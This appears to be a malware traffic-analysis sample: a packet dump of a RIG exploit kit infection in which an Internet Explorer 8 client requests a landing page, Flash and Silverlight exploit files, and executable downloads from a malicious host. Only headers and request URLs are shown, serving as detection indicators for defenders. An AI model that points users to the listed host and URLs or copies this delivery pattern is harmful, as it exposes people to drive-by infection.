RIG Exploit Kit Shockwave Flash Silverlight Traffic Analysis Sample PCAP file download

2015-02-05 19:18:44.979982 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [.], ack 1, win 64240, length 0
E..(.|@…………….P..@.}..+P…’………
2015-02-05 19:18:44.981188 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [P.], seq 1:603, ack 1, win 64240, length 602: HTTP: GET /?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
E….}@….p………..P..@.}..+P…
…GET /?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:18:44.981212 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [.], ack 603, win 64240, length 0
E..(C…………….P..}..+..CGP…%a……..
2015-02-05 19:18:46.627230 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [P.], seq 1:1356, ack 603, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..sEi……………P..}..+..CGP…A…HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:18:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding
Content-Encoding: gzip

2015-02-05 19:18:50.475075 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [P.], seq 603:1019, ack 72089, win 64240, length 416: HTTP: GET /index.php?req=mp3&num=39&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
E…..@…………….P..CG}.2.P…….GET /index.php?req=mp3&num=39&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:18:50.475173 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [.], ack 1019, win 64240, length 0
E..(I}……………P..}.2…D.P…
(……..
2015-02-05 19:18:55.945377 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [P.], seq 72089:73444, ack 1019, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..sN……6………P..}.2…D.P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:18:55 GMT
Content-Type: application/x-msdownload
Content-Length: 294912
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Accept-Ranges: bytes

2015-02-05 19:18:58.699151 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [P.], seq 1019:1631, ack 367224, win 63207, length 612: HTTP: GET /index.php?req=swf&num=1779&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
E…..@…………….P..D.}…P…+D..GET /index.php?req=swf&num=1779&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cast.autolistprofits.net/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:18:58.699233 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [.], ack 1631, win 64240, length 0
E..(R`……………P..}…..GKP………….
2015-02-05 19:18:59.324451 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [P.], seq 367224:368579, ack 1631, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..sR…………….P..}…..GKP…,$..HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:18:58 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 20239
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14

2015-02-05 19:19:00.734735 IP 192.168.221.134.49586 > 46.182.30.163.80: Flags [P.], seq 1:290, ack 1, win 64240, length 289: HTTP: GET /index.php?req=mp3&num=1155&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU&dop=1 HTTP/1.1
E..I..@…./………..P…Y)~  AP…2{..GET /index.php?req=mp3&num=1155&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU&dop=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: cast.autolistprofits.net

2015-02-05 19:19:00.734812 IP 46.182.30.163.80 > 192.168.221.134.49586: Flags [.], ack 290, win 64240, length 0
E..(T{……………P..)~      A…zP….I……..
2015-02-05 19:19:01.474645 IP 46.182.30.163.80 > 192.168.221.134.49586: Flags [P.], seq 1:205, ack 290, win 64240, length 204: HTTP: HTTP/1.1 200 OK
E…U2…..I………P..)~      A…zP…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:19:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding

2015-02-05 19:19:01.787474 IP 192.168.221.134.49587 > 46.182.30.163.80: Flags [P.], seq 1:408, ack 1, win 64240, length 407: HTTP: GET /index.php?req=xap&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
E…..@…………….P.K’.;…P…07..GET /index.php?req=xap&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|ZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:19:01.787528 IP 46.182.30.163.80 > 192.168.221.134.49587: Flags [.], ack 408, win 64240, length 0
E..(U…………….P..;….K)5P…wq……..
2015-02-05 19:19:02.486632 IP 46.182.30.163.80 > 192.168.221.134.49587: Flags [P.], seq 1:1356, ack 408, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..sV:……………P..;….K)5P…`…HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:19:02 GMT
Content-Type: application/x-silverlight-app
Content-Length: 26238
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14

2015-02-05 19:19:05.616016 IP 192.168.221.134.49585 > 46.182.30.163.80: Flags [P.], seq 1631:2059, ack 387668, win 64240, length 428: HTTP: GET /index.php?req=mp3&num=90199&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU&dop=0828 HTTP/1.1
E…    @…………….P..GK}..~P…R…GET /index.php?req=mp3&num=90199&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CZjA1YzNkM2M4NWMxMDBlMWIyODgyMzgwNmZkY2NmODU&dop=0828 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cast.autolistprofits.net
Connection: Keep-Alive

2015-02-05 19:19:05.616097 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [.], ack 2059, win 64240, length 0
E..(YZ……………P..}..~..H.P…5X……..
2015-02-05 19:19:08.130541 IP 46.182.30.163.80 > 192.168.221.134.49585: Flags [P.], seq 387668:389023, ack 2059, win 64240, length 1355: HTTP: HTTP/1.1 200 OK
E..s[……0………P..}..~..H.P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Thu, 05 Feb 2015 23:19:07 GMT
Content-Type: application/x-msdownload
Content-Length: 294912
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Accept-Ranges: bytes